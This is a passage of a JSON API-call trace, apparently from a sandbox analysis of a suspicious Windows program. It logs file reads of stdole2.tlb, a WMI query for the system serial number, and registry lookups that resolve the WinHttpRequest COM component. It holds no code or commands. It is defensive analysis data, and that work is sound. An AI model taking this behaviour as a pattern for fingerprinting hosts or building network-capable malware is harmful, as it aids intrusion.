            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\xf8\\x04\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1057
          },
          {
            "timestamp": "2025-11-20 10:58:33,937",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtReadFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "Buffer",
                "value": "\\x03\\x00"
              },
              {
                "name": "Length",
                "value": "2"
              }
            ],
            "repeated": 0,
            "id": 1058
          },
          {
            "timestamp": "2025-11-20 10:58:33,937",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x18\\x04\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1059
          },
          {
            "timestamp": "2025-11-20 10:58:33,937",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtReadFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "Buffer",
                "value": "\\xe8\\x00\\x00\\x80@\\x00\\x00\\x80"
              },
              {
                "name": "Length",
                "value": "8"
              }
            ],
            "repeated": 0,
            "id": 1060
          },
          {
            "timestamp": "2025-11-20 10:58:33,937",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtQueryInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": " \\x04\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 1,
            "id": 1061
          },
          {
            "timestamp": "2025-11-20 10:58:33,937",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\xe8\\x04\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1062
          },
          {
            "timestamp": "2025-11-20 10:58:33,937",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtReadFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "Buffer",
                "value": "\\x07\\x00"
              },
              {
                "name": "Length",
                "value": "16"
              }
            ],
            "repeated": 0,
            "id": 1063
          },
          {
            "timestamp": "2025-11-20 10:58:33,937",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": " \\x04\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1064
          },
          {
            "timestamp": "2025-11-20 10:58:33,953",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 2,
            "id": 1065
          },
          {
            "timestamp": "2025-11-20 10:58:33,953",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "@\\x04\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1066
          },
          {
            "timestamp": "2025-11-20 10:58:33,953",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtReadFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "Buffer",
                "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00"
              },
              {
                "name": "Length",
                "value": "16"
              }
            ],
            "repeated": 0,
            "id": 1067
          },
          {
            "timestamp": "2025-11-20 10:58:33,953",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtQueryInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "P\\x04\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 1,
            "id": 1068
          },
          {
            "timestamp": "2025-11-20 10:58:33,953",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtReadFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "Buffer",
                "value": "\\x01\\x00\\x00\\x00\\x88\\x00\\x00\\x80"
              },
              {
                "name": "Length",
                "value": "8"
              }
            ],
            "repeated": 0,
            "id": 1069
          },
          {
            "timestamp": "2025-11-20 10:58:33,953",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 2,
            "id": 1070
          },
          {
            "timestamp": "2025-11-20 10:58:33,953",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x88\\x04\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1071
          },
          {
            "timestamp": "2025-11-20 10:58:33,953",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtReadFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "Buffer",
                "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00"
              },
              {
                "name": "Length",
                "value": "24"
              }
            ],
            "repeated": 0,
            "id": 1072
          },
          {
            "timestamp": "2025-11-20 10:58:33,953",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1073
          },
          {
            "timestamp": "2025-11-20 10:58:33,953",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\xc8\\x04\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1074
          },
          {
            "timestamp": "2025-11-20 10:58:33,953",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtReadFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "Buffer",
                "value": "\\x00!\\x00\\x00@:\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              },
              {
                "name": "Length",
                "value": "16"
              }
            ],
            "repeated": 0,
            "id": 1075
          },
          {
            "timestamp": "2025-11-20 10:58:33,953",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtQueryInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "5",
                "pretty_value": "FileStandardInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x00 \\x00\\x00\\x00\\x00\\x00\\x00\\x00H\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1076
          },
          {
            "timestamp": "2025-11-20 10:58:33,953",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtCreateSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x0000037c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x000f0005",
                "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ"
              },
              {
                "name": "ObjectAttributes",
                "value": ""
              },
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              }
            ],
            "repeated": 0,
            "id": 1077
          },
          {
            "timestamp": "2025-11-20 10:58:33,953",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x0000037c"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x02da0000"
              },
              {
                "name": "SectionOffset",
                "value": "0x007f7e30"
              },
              {
                "name": "ViewSize",
                "value": "0x00004000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1078
          },
          {
            "timestamp": "2025-11-20 10:58:33,953",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "WMI_Get",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Name",
                "value": "SerialNumber"
              },
              {
                "name": "Value",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 1079
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "WMI_Get",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Name",
                "value": "SerialNumber"
              },
              {
                "name": "Value",
                "value": "93511-284-3209639-43747"
              }
            ],
            "repeated": 0,
            "id": 1080
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x140085182",
            "parentcaller": "0x1400a6caf",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 1081
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x140085182",
            "parentcaller": "0x1400a6caf",
            "category": "system",
            "api": "NtWaitForSingleObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000033c"
              },
              {
                "name": "Milliseconds",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 1082
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x000002c2"
              },
              {
                "name": "SubKey",
                "value": "WinHttp.WinHttpRequest.5.1"
              },
              {
                "name": "Handle",
                "value": "0x0000036e"
              },
              {
                "name": "FullName",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\WinHttp.WinHttpRequest.5.1"
              }
            ],
            "repeated": 0,
            "id": 1083
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000036e"
              },
              {
                "name": "SubKey",
                "value": "CLSID"
              },
              {
                "name": "Handle",
                "value": "0x00000372"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\WinHttp.WinHttpRequest.5.1\\CLSID"
              }
            ],
            "repeated": 0,
            "id": 1084
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000372"
              },
              {
                "name": "ValueName",
                "value": ""
              },
              {
                "name": "Data",
                "value": "{2087c2f4-2cef-4953-a8ab-66779b670495}"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\WinHttp.WinHttpRequest.5.1\\CLSID\\(Default)"
              }
            ],
            "repeated": 0,
            "id": 1085
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000372"
              }
            ],
            "repeated": 0,
            "id": 1086
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000036e"
              }
            ],
            "repeated": 0,
            "id": 1087
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "NtOpenKey",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00020119",
                "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\MACHINE\\Software\\Classes\\PackagedCom"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Classes\\PackagedCom"
              }
            ],
            "repeated": 0,
            "id": 1088
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x000002c2"
              },
              {
                "name": "SubKey",
                "value": "WinHttp.WinHttpRequest.5.1"
              },
              {
                "name": "Handle",
                "value": "0x0000036e"
              },
              {
                "name": "FullName",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\WinHttp.WinHttpRequest.5.1"
              }
            ],
            "repeated": 0,
            "id": 1089
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000036e"
              },
              {
                "name": "SubKey",
                "value": "CLSID"
              },
              {
                "name": "Handle",
                "value": "0x00000372"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\WinHttp.WinHttpRequest.5.1\\CLSID"
              }
            ],
            "repeated": 0,
            "id": 1090
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000372"
              },
              {
                "name": "ValueName",
                "value": ""
              },
              {
                "name": "Data",
                "value": "{2087c2f4-2cef-4953-a8ab-66779b670495}"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\WinHttp.WinHttpRequest.5.1\\CLSID\\(Default)"
              }
            ],
            "repeated": 0,
            "id": 1091
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000372"
              }
            ],
            "repeated": 0,
            "id": 1092
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000036e"
              }
            ],
            "repeated": 0,
            "id": 1093
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x000002c6"
              },
              {
                "name": "SubKey",
                "value": "CLSID\\{2087C2F4-2CEF-4953-A8AB-66779B670495}"
              },
              {
                "name": "Handle",
                "value": "0x0000036e"
              },
              {
                "name": "FullName",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2087C2F4-2CEF-4953-A8AB-66779B670495}"
              }
            ],
            "repeated": 0,
            "id": 1094
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000036e"
              },
              {
                "name": "KeyInformation",
                "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}"
              },
              {
                "name": "KeyInformationClass",
                "value": "3"
              }
            ],
            "repeated": 0,
            "id": 1095
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000036e"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 1096
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "\\x10\\x94\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x087\\x8c\\xb7\\xfe\\x7f\\x00\\x00n\\x03\\x00\\x00\\x00\\x00\\x00\\x000:\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x95\\x7f\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1097
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\TreatAs"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\TreatAs"
              }
            ],
            "repeated": 0,
            "id": 1098
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000036e"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 1099
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x0000036e"
              },
              {
                "name": "ObjectAttributesName",
                "value": "TreatAs"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\TreatAs"
              }
            ],
            "repeated": 0,
            "id": 1100
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000036e"
              },
              {
                "name": "KeyInformation",
                "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}"
              },
              {
                "name": "KeyInformationClass",
                "value": "3"
              }
            ],
            "repeated": 0,
            "id": 1101
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000036e"
              },
              {
                "name": "ValueName",
                "value": "ActivateOnHostFlags"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\ActivateOnHostFlags"
              }
            ],
            "repeated": 0,
            "id": 1102
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000036e"
              },
              {
                "name": "ValueName",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\(Default)"
              }
            ],
            "repeated": 0,
            "id": 1103
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000036e"
              },
              {
                "name": "ValueName",
                "value": ""
              },
              {
                "name": "Data",
                "value": "WinHttpRequest Component version 5.1"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\(Default)"
              }
            ],
            "repeated": 0,
            "id": 1104
          },
          {
            "timestamp": "2025-11-20 10:58:33,969",
            "thread_id": "2188",
            "caller": "0x14008240f",
            "parentcaller": "0x140089aa8",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
